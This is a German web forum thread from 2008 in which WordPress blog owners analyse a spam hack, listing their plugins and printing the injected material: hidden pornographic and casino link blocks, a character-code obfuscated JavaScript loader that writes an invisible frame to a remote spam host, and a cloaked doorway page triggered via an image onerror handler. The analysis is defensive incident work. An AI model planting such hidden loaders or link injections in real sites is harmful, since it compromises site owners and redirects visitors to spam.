Gemeinsamkeiten zwischen geknackten WP-Blogs

Fellow Passenger · 25.03.2008, 12:15

Weil niemand so genau weiß, wie die Potenzpillenhökerer die Blogs geknackt haben, die man tausenfach über Google finden kann, möchte ich hier mal Gemeinsamkeiten der Betroffenen sammeln.

Anscheinend gibt es mehrere Varianten. Nicht alle Betroffenen haben das ungewollte Verzeichnis /wp-content/1. Immer geht es aber um Linklisten, die entweder direkt in die Artikel oder in die Templates eingebaut werden. Teils werden sie über Style-Anweisungen versteckt, gerne auch per <noscript>.

Es scheint sich nicht um die xmlrpc-Problematik zu handeln, denn genau die soll ja durch WP 2.3.3 behoben sein. Mehr Informationen auch bei Ja gut, aber ... und Lumières dans la nuit

Version 2.3.3
Plugins:

Akismet 2.1.4
Audioplayer 1.2.3
CapCC 1.0
Democracy 2.0.1
Democracy Widget 1.0 (inaktiv)
Filosofo Comments Preview 1.0.4
Follow-URL 1.0
Get Recent Comments 2.0.2
Instant Upgrade 0.2
Link Truncator 0.5
LMB^Box Comment Quicktags 2.4
Nusuni Technorati Links 1.1
o42-clean-umlauts 0.2.0
Simple Trackback Validation 2.1
Time Zone 2.1
Update Monitor 1.3
WLW Disabler 1.0
Wordpress Database Backup 2.1.5
WP Lightbox JS 0.6

Vielleicht läßt sich so die Sicherheitslücke einkreisen.

berlindave · 25.03.2008, 12:43

Blog: Ja gut, aber …

WP-Version: 2.2.1

Theme: Intense 1.0 (selbst eingedeutscht, leicht modifiziert)

Aktivierte PlugIns:

Akismet 2.0.2
Audio Player 1.2.3
Better Comments Manager 1.3
Brian's Threaded Comments 1.5.12
Comment Analysis 2.1
Exec-PHP 3.2
FeddBurner FeedSmith 2.2
Follow-URL 1.0
Link Indication 3.2
Link Truncator 0.5
Maintenance Mode 3.2
Math Comment Spam Protection 2.1
No Self Pings 0.2
o42-clean-umlauts 0.2.0
Pagebar 1.3.2
Sayfa Sayac - PostReadConter (de) 3.21 de
Search All 0.3
semmelstatz 3.0.1
Simple Tagging 1.6.7
Subscribe To Comments 2.1.1
Trackback Validator 0.7.1
Zap_NewWindow 1.2

Deaktivierte PlugIns:

Hello Dolly 1.5
Social Bookmarks 3.2
Update-Monitor 1.3

Kurze Beschreibung des Hack-Angriffs:

Jeweils im letzten Posting wurde an den Artikel HTML-Code der folgenden Art angehängt:

Code:

<font style="position: absolute;overflow: hidden;height: 0;width: 0"><!--4848--><a href="http://macammacam.info/down.php?tits.htm">big cocks tight pussies</a>
<a href="http://macammacam.info/down.php?websites.htm">that big tit site</a>
<a href="http://macammacam.info/down.php?teen.htm">pre teen model gallery</a>
<a href="http://macammacam.info/down.php?korean.htm">hot korean girl rides a cock</a>
<a href="http://macammacam.info/down.php?les.htm">big tit lesbians</a>
<a href="http://macammacam.info/down.php?dvd1.htm">Swank Rax Sex Trio-5 CD-2</a>
<a href="http://macammacam.info/down.php?fisting.htm">fist and squirt vids</a>
<a href="http://macammacam.info/down.php?slut.htm">young sluts with glasses</a>
<a href="http://macammacam.info/down.php?nylon.htm">hogtied in nylons</a>
<a href="http://macammacam.info/down.php?videos.htm">rough sex movies</a>
<a href="http://macammacam.info/down.php?naked.htm">naked chick videos</a>
[…]
</font>

Durch die CSS-Formatierung "height: 0;width: 0" waren die Links bei Ansicht im Browser unsichtbar, einige RSS-Reader stellten sie jedoch dar. Die Spam-Links wurden in kurzen Abständen erneuert.

Ein Verzeichnis 'wp-content/1' wurde nicht angelegt.

(Vorläufige) Lösung des Problems:

Das Administrator-Kennwort wurde geändert. Seither sind keine neuen Spam-Links aufgetreten.

jottlieb · 25.03.2008, 12:46

Hmm, ich denke/hoffe mal, dass sie in das San Francisco auch schon mitbekommen haben. Vielleicht ein denkbarer Grund, warum WP 2.5 noch nicht erschienen ist. Aber das ist reine Spekulation. Auf jeden Fall bleibt abzuwarten, ob während des Releases von 2.5 auf evtl. gestopfte Sicherheitslücken eingegangen wird oder ob zukünftig auch 2.5 Blogs betroffen sind. Dann wurde entweder die Lücke, falls sie in WP enthalten ist, von den Entwicklern nicht entdeckt (und geschlossen) oder es ist, wie schon vermutet, ein Plugin dran schuld.

Nachtrag: Hmm, habe im trac kein entsprechendes Ticket bzgl. Sicherheitslücken gefunden.

Fellow Passenger · 25.03.2008, 13:42

Bei den Blogs, die das unerwünschte Verzeichnis enthalten, findet sich übrigens folgendes Java-Script:

Code:

function Decode()
{
var temp="",i,c=0,out="";
var str="118#97#114#32#114#101#102#101#114#101#114#32#61#32#101#115#99#97#112#101#40#100#111#99#117#109#101#110#116#46#114#101#102#101#114#114#101#114#41#59#10#118#97#114#32#102#114#111#109#100#32#32#32#32#61#32#101#115#99#97#112#101#40#100#111#99#117#109#101#110#116#46#108#111#99#97#116#105#111#110#41#59#10#100#111#99#117#109#101#110#116#46#119#114#105#116#101#40#34#60#102#114#97#109#34#43#34#101#115#101#116#32#102#114#97#109#101#34#43#34#98#111#114#100#101#114#61#48#32#102#114#97#109#101#115#34#43#34#112#97#99#105#110#103#61#48#32#98#111#114#100#101#114#61#48#32#114#111#119#115#61#92#34#49#34#43#34#48#48#37#44#32#42#32#92#34#110#111#114#101#115#105#122#101#62#60#102#114#34#43#34#97#109#101#32#110#97#109#101#61#92#34#111#110#108#105#110#101#92#34#32#115#114#99#61#92#34#34#43#102#105#100#43#34#38#113#61#34#43#113#49#43#34#38#114#101#102#101#114#101#114#61#34#43#114#101#102#101#114#101#114#43#34#38#108#61#34#43#108#97#110#103#43#34#38#99#61#34#43#115#117#98#97#99#99#43#34# 38#102#114#111#109#61#34#43#102#114#111#109#100#43#34#92#34#32#110#111#114#101#115#105#122#101#62#60#47#102#114#97#34#43#34#109#101#115#101#116#62#34#41#59#";
l=str.length;
while(c<=str.length-1)
    {
    while(str.charAt(c)!='#')
    temp=temp+str.charAt(c++);
    c++;
    out=out+String.fromCharCode(temp);
    temp="";
    }
document.write(out);
}


function r(keyw, cat, lang)
{
document.write("<script language='javascript'>");
document.write("var fid='http://www.preserve"+"sight"+"colorado.org/feb.php?2'; var q1='"+keyw+"'; var lang='"+lang+"'; var subacc='"+cat+"';");
Decode();
document.write("<\/script>");
}

Kann sich darauf jemand einen Reim machen?

Mod.: Bitte lesen und Code-Sequenzen zukünftig als solche auszeichnen!

Arno Simon · 25.03.2008, 13:51

Zitat:

Zitat von Fellow Passenger

Kann sich darauf jemand einen Reim machen?

irgendwo im Seitenquelltext muss sich dann noch ein Snippet verstecken, welches die Funktion r() aufruft. An die Stelle wird dann die Ausgabe der beiden Funktionen gepappt. Die Funktion Decode() enthält vermutlich den, als simple Bytefolge, codierten Linktext.

vG

Arno

maxb · 25.03.2008, 14:01

Zitat:

Zitat von Fellow Passenger

Kann sich darauf jemand einen Reim machen?

Wenn man das Codierte "118#97#114#...." da im JavaScript ausführt, steht im Seitenquelltext

Code:

var referer = escape(document.referrer);
var fromd    = escape(document.location);
document.write("<fram"+"eset frame"+"border=0 frames"+"pacing=0
    border=0 rows=\"1"+"00%, * \"noresize><fr"+"ame name=\"online\"
   src=\""+fid+"&q="+q1+"&referer="+referer+"&l="+
   lang"&c="+subacc+"&from="+fromd+"\" noresize></fra"+"meset>");

Soll vermutlich nur verhindern, dass man "frameset" gleich findet...

Fellow Passenger · 25.03.2008, 14:41

Stimmt, Arno, hier ist eine der HTML-Dateien:

Code:

<html>
<head>
<meta http-equiv="Content-Language" content="fr">
<title>Www geant casino fr</title>
<meta name="description" content="www geant casino fr">
<meta name="keywords" content="www geant casino fr">
<meta name="robots" content="index, follow" >
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta name="generator" content="WordPress 2.3.2" />
<script language="JavaScript" src="g.js"></script>
</head>
<body>

<img src="xcdffg" onerror="r('www geant casino fr', '1','2');"/>

<table border="0" cellpadding="0" cellspacing="0" width="100%" height="1">
  <tr>
<td width="69%" height="118" align="left" valign="top">
<h2><span style="background-color: #00FFFF">Www geant casino fr</span></h2>

<h1>Www Geant Casino Fr</h1>
 <em>Www geant casino fr</em> A l'occasion que vous pouvez faire tout cela vous attend sur le web. Sur les jeux avec nous! Casino Jeu vous avez envie. <b><i>Www geant casino fr</i></b> 
Si aimez l'aventures et le zéro, et les joueurs qui usent de cette notoriété.. <b>Www geant casino fr</b> 
et de la maison. <strong>Www geant casino fr</strong> 
De centaines de sites, proposants des divertissements électroniques. Amusez-vous en jouant à des règles strictes pour le joueur.Le comptage des cartes du BaccaratLe but du joueur - tous les jeux, proposés sur notre site sont les jeux en ligne et bonne chance avec nos jeux passionnants et proposent aux visiteurs sur les pages de Jouer dans un rapport de 8 (ligne 101, 103, 105, 106, 107, 111, 120 et M320).Le quartier est situé sur la rentabilité économique du projet a probablement poussé le gouvernement a faire votre dépôt, sans risque, ainsi que le Vidéo Poker a 5 joueurs. Les jeux gratuits sont préférés surtout par les joueurs s'ils veulent jouer pour l'argent réel sur Internet. <b><i>Www geant casino fr</i></b> 
Les innovations électroniques et d'Internet vous présente une vaste gamme des jeux de casino en ligne, sans téléchargement. Vous devez d'abord créer votre compte personnelle. <b><i>Www geant casino fr</i></b> 
Les paiements peuvent être réalisées par chèque, par virement bancaire. Www geant casino fr 
Notre site vous retrouvrez une grande variété de jeux, tels que le logiciel est compatible avec votre ordinateur personnel et on joue le Blackjack (valet noir en attendant que l'argent coule à flots. Le Tangiers a bien été démantelé, les péchés et les aventures, vous pouvez gagner de cosidérables sommes d'argent, pendant qu'il s'amuse. Le site de jeux en ligne gratuits, pour le plaisir. Si vous préférez le frisson du jeu reçoit un bonus généreux attendent les visiteurs. </td>
  </tr>
  </table>
<p>Copyright 200<span lang="en-us">7</span> <a href="www-geant-casino-fr.html">www geant casino fr</a></p>
</body>

</html>

Damit bestätigt sich die Theorie, daß der Frameset-Tag verschleiert werden soll. (Ich hatte zunächst befürchtet, es wäre ein Buffer-Overflow-Angriff auf den Browser.)

Webrocker · 25.03.2008, 18:19

HTML-Code:

<img src="xcdffg" onerror="r('www geant casino fr', '1','2');"/>

damit wird ein nichtexistentes bild eingebunden, weil es nicht existiert, wird der browser bei eingeschaltetem javascript veranlasst, die funktion

HTML-Code:

onerror="r('www geant casino fr', '1','2');

auszuführen.
Diese erzeugt einen "unsichtbaren" frame, in dem als src eine datei gerufen wird, die

HTML-Code:

http://www.preservesightcolorado.org/feb.php?2
&q=www geant casino fr
&referer=escape(document.referrer);
&1=2
&c=1
&from=escape(document.location)

offenbar anhand von Keyword, Language und Kategorie sowie referrer und location "erkennt", wo das Blog gecrackt wurde und (wahrscheinlich) den eigentlichen Spaminhalt ausgibt.
Wenn man die Datei mit den Parametern aus dem Beispiel von Hand füttert, erfolgt ein redirect auf http www 888 com (link kaputtgemacht

)

maxb · 25.03.2008, 20:10

Grad ergoogled: Letzte Woche gab es diese Diskussion bei wordpress.org, das ist wohl das gleiche Problem...

Inwieweit die eine Lösung gefunden haben, ist mir nicht klar, sehr gesprächig sind die da nicht. Aber so wie es aussieht, gehört ein (vor langer Zeit) gekapertes Benutzer-Passwort (oder sein Coookie) zum Angriff dazu. Von speziellen angreifbaren Plugins ist dort nicht die Rede.

Herr Schmidt · 25.03.2008, 20:28

gibt es eine einfache Möglichkeit die eigene Seiten schnell auf eventuellen Spam zu checken? Ind er internen Suche werden die URLs ja wohl nicht angezeigt, wenn sie per Script eingebunden sind.